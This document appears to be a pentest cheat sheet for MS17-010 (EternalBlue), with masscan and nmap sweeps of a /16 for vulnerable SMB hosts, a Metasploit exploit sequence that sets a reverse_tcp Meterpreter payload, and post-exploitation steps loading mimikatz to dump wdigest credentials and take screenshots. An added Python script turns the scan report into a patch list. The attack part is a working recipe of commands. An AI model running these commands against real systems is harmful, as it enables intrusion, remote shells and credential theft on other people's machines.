One-Shot Guide
Scanning
References
https://masterxsec.github.io/2017/05/27/Metasploit%E4%B8%AD%E7%9A%84MS17-010/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
Other exploits
https://github.com/jflyup/goMS17-010
You can also use the scanner that ships with msf: auxiliary/scanner/smb/smb_ms17_010

```shell
# find every host with 445/tcp open, then hand only those to the nmap NSE check
sudo masscan -p445 192.168.1.1/16 > 445_open.txt
vi 445_open.txt   # keystrokes: ctrl+v G wwww d :q  (strip masscan's text prefix so only the IPs remain)
nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txt
```
Exploitation
msfconsole

```
use exploit/windows/smb/ms17_010_eternalblue
show targets
set TARGET <target-id>
show options
# set payload windows/x64/meterpreter/reverse_tcp
# set payload windows/meterpreter/reverse_tcp
set RHOST <remote_host>
set LHOST <0.0.0.0>
options
exploit
```
Nmap
Building
Build Nmap from source (compile nmap)

```shell
$ sudo apt-get install git wget build-essential checkinstall libpcre3-dev libssl-dev clang
$ git clone https://github.com/nmap/nmap.git
```
Nmap and MS17-010

```shell
nmap 192.168.1.1 --script smb-vuln-ms17-010
# note: -sn disables the port scan, so an NSE script that needs 445 to be found open will not fire
nmap 192.168.1.1 -Pn -sn --script smb-vuln-ms17-010
nmap -iL list.txt -Pn -sn --script smb-vuln-ms17-010
nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txt
```
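As an added example (not part of the original post), the following Python turns the 17010.txt report written by the nmap commands above into a list of hosts that still need the MS17-010 patch; the sample report is constructed to mirror nmap's normal output layout, and its addresses are placeholders.

```python
"""Turn the nmap report (17010.txt) into a patch list. Added example, not from the
original post; SAMPLE_REPORT is constructed in nmap's normal-output layout."""
import re
from typing import Dict, List

# Constructed sample: host .20 flagged VULNERABLE, host .21 gave no verdict.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.1.20

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE

Nmap scan report for fileserver.example.test (192.168.1.21)

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms17-010: Could not connect to 'IPC$'
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?$")
STATE_RE = re.compile(r"^\|\s+State:\s+(\S+)")

def parse_report(text: str) -> Dict[str, str]:
    """Map each host IP to the State its smb-vuln-ms17-010 block reports.
    Hosts where the script produced no State line are omitted."""
    results: Dict[str, str] = {}
    host, in_script = None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                      # a new host section starts
            host, in_script = m.group(1), False
        elif "smb-vuln-ms17-010" in line and line.startswith("|"):
            in_script = True       # first line of the script's output block
        elif in_script and host and (m := STATE_RE.match(line)):
            results[host] = m.group(1)
        elif not line.startswith("|"):
            in_script = False      # left the NSE output block
    return results

def hosts_to_patch(text: str) -> List[str]:
    """IPs reported VULNERABLE, sorted for a remediation ticket."""
    return sorted(ip for ip, st in parse_report(text).items() if st == "VULNERABLE")
```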
https://www.darkoperator.com/installing-metasploit-in-ubunt/
```shell
sudo proxychains4 apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
```
Meterpreter

```
msf> load mimikatz
wdigest
screenshot
sysinfo
```